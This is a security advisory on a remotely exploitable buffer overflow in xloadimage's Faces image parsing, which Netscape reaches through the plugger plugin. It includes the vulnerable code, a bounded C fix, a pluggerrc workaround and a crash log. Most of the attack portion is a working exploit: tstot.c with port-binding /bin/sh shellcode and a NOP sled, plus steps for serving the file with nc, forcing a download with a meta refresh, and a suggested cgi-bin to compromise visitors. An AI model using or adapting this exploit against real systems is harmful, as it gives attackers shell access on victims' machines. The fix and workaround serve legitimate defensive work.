The xloadimage application suffers from a buffer overflow vulnerability. While this is normally not a security problem, xloadimage is called by the 'plugger' program from inside Netscape to handle some image types. Hence, a remote site could cause arbitrary code to be executed as the user running Netscape. It is recommended that users of Netscape and plugger update to the fixed xloadimage packages.
Credit:
The information has been provided by zen-parse.
/usr/X11R6/bin/xloadimage is used as a helper application by Netscape 4.77, via the /usr/lib/netscape/plugins/plugger.so plugin, to display certain image types (TIFF and Sun Rasterfile formats, as /etc/pluggerrc sets up by default) inside the Netscape browser window.
The problem is that xloadimage has an exploitable overflow in its handling of Faces-format images. Because plugger hands the downloaded file straight to xloadimage, a remote site can make Netscape execute attacker-supplied shellcode with the privileges of the user running the browser. The coding error is the following (BUFSIZ is 8192):
...
char fname[BUFSIZ];
char lname[BUFSIZ];
char buf[BUFSIZ];
...
if (!strncmp(buf, "FirstName:", 10))
    strcpy(fname, buf + 11);
else if (!strncmp(buf, "LastName:", 9))
    strcpy(lname, buf + 10);
...
fname[strlen(fname) - 1] = ' ';     /* replace the trailing newline with a space */
strcat(fname, lname);               /* unbounded: fname + lname can exceed BUFSIZ */
fname[strlen(fname) - 1] = '\0';
...
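As an added example (not xloadimage's code), here is the same FirstName/LastName handling with bounds: both the header copy and the join are length-limited, and the second worked case reproduces a 5000-byte plus 5000-byte input that the original strcat() would have pushed past the 8192-byte fname. Function names and NAME_BUF are assumptions.

```c
/* Added example, not xloadimage's code: a bounded version of the FirstName/
 * LastName handling quoted above (names are assumptions; NAME_BUF = BUFSIZ). */
#include <stdio.h>
#include <string.h>
#define NAME_BUF 8192

/* If line starts with key, copy the rest into out (bounded, NUL-terminated,
 * trailing newline dropped) and return 1; else return 0. */
static int header_value(const char *line, const char *key, char *out, size_t outlen)
{
    size_t klen = strlen(key), n;
    if (strncmp(line, key, klen) != 0)
        return 0;
    snprintf(out, outlen, "%s", line + klen);     /* truncates instead of overflowing */
    n = strlen(out);
    if (n > 0 && out[n - 1] == '\n')
        out[n - 1] = '\0';
    return 1;
}

/* Join "first last" into dst. Returns the length the full result needs (>= dstlen
 * means truncated). The original strcat() had no bound and could write ~2*BUFSIZ bytes. */
static size_t join_names(char *dst, size_t dstlen, const char *first, const char *last)
{
    int n = snprintf(dst, dstlen, "%s %s", first, last);
    return n < 0 ? 0 : (size_t)n;
}

/* Worked case: two constructed 5000-byte names. The original code would need
 * 10001 bytes of an 8192-byte fname; here the join stops at the buffer end. */
static size_t demo_long_names(void)
{
    static char first[5001], last[5001], fname[NAME_BUF];
    memset(first, 'A', 5000); first[5000] = '\0';
    memset(last, 'B', 5000);  last[5000] = '\0';
    size_t needed = join_names(fname, sizeof fname, first, last);
    return strlen(fname) == NAME_BUF - 1 ? needed : 0;   /* 10001 */
}

/* Worked case: ordinary header lines as a Faces file carries them (constructed). */
static const char *demo_headers(void)
{
    static char fname[NAME_BUF], lname[NAME_BUF], out[NAME_BUF];
    const char *lines[] = { "FirstName: Ada\n", "LastName: Lovelace\n" };
    for (int i = 0; i < 2; i++)
        if (!header_value(lines[i], "FirstName: ", fname, sizeof fname))
            header_value(lines[i], "LastName: ", lname, sizeof lname);
    join_names(out, sizeof out, fname, lname);
    return out;                                           /* "Ada Lovelace" */
}
```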
Solution:
See the bug ID in Red Hat Bugzilla (http://bugzilla.redhat.com/bugzilla) for more info:
46186 - Remotely exploitable overflow via Netscape
Workaround:
Disable xloadimage from being used as a helper application for Netscape by changing the line in /etc/pluggerrc that reads:
exits: xloadimage -quiet -windowid $window $file
Into
# exits: xloadimage -quiet -windowid $window $file
Or remove that line.
How to test:
bash-2.04$ make tstot
cc tstot.c -o tstot
bash-2.04$ ./tstot >tstot.tif
bash-2.04$ ls -al tstot.tif
-rw-r--r-- 1 evil evil 75707 Jun 27 16:53 tstot.tif
bash-2.04$ gdb -q xloadimage
(no debugging symbols found)...(gdb) r evil.tif
Starting program: /usr/X11R6/bin/xloadimage evil.tif
(no debugging symbols found)...(no debugging symbols found)...
evil.tif is a 32x32 8-bit grayscale Faces Project image
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0xdeadbeef in ?? ()
(gdb)
Another way of launching the exploit is:
bash-2.04$ ./tstot something|nc -l -p 9876
And do a refresh in your HTML:
<META HTTP-EQUIV="Refresh" Content="1;url=http://youraddress:9876/">
This could also be made into an evil cgi-bin that checks for a (potentially) vulnerable machine before firing it to them, and then connects to the listening port and 0wns them with a local exploit.
Exploit:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

//#define TARGET 0x080e1337
//as 1337 as the 1337357 kiddies.
#define TARGET 0xdeadbeef
// lamagra's port binding shell code (from bind.c in the sc.tar.gz)
//
char lamagra_bind_code[] =
  "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
  "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
  "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x1d\x29\x89\x4d\xf0"
  "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
  "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
  "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
  "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
  "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";
// slight modification so it listens on 7465 instead of 3879
// TAGS is easier to remember ;]

/* Returns an 8199-byte filler block: a 0x90 (nop) sled with a short forward
 * jmp every 122 bytes when doit == 0, or the same sled with the shell code
 * copied in at offset 7000 when doit == 1. */
char *
this (int doit)
{
  char *p;
  int v;
  p = (char *) malloc (8200);
  memset (p, 0x90, 8200);
  if (!doit)
    for (v = 0; v < 8100; v += 122)
      {
        p[v] = 0xeb;          /* jmp short ... */
        p[v + 1] = 120;       /* ... 120 bytes ahead, over the sled */
      }
  if (doit)
    memcpy (&p[7000], lamagra_bind_code, strlen (lamagra_bind_code));
  p[8199] = 0;
  return p;
}

int
main (int argc, char **argv)
{
  int z0, x = TARGET;
  int z1, y = x;
  int p;
  char *q;
  (void) argv;
  /* With any argument, prefix an HTTP response so the file can be served with nc */
  if (argc > 1)
    printf ("HTTP/1.0 200\nContent-Type: image/x-tiff\n\n");
  /* Faces header lines: FirstName fills fname, LastName is what strcat() appends */
  printf ("FirstName: %s\n", this (0));
  printf ("LastName: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX");
  printf ("%s\n", (char *) &x);   /* the raw bytes of TARGET */
  // Begin Padding Heap With 'Garbage' (nop/jmp)
  printf ("%s", this (0));
  printf ("%s", this (0));
  printf ("%s", this (0));
  printf ("%s", this (0));
  printf ("%s", this (0));
  printf ("%s", this (0));
  // End Padding Heap With 'Garbage' (nop/jmp)
  printf ("%s", this (1));
  printf ("http://www.mp3.com/cosv");
  printf ("\nPicData: 32 32 8\n");
  printf ("\n");
  for (p = 0; p < 9994; p += 1)
    printf ("A");
  return 0;
}
// EOF -- tstot.c --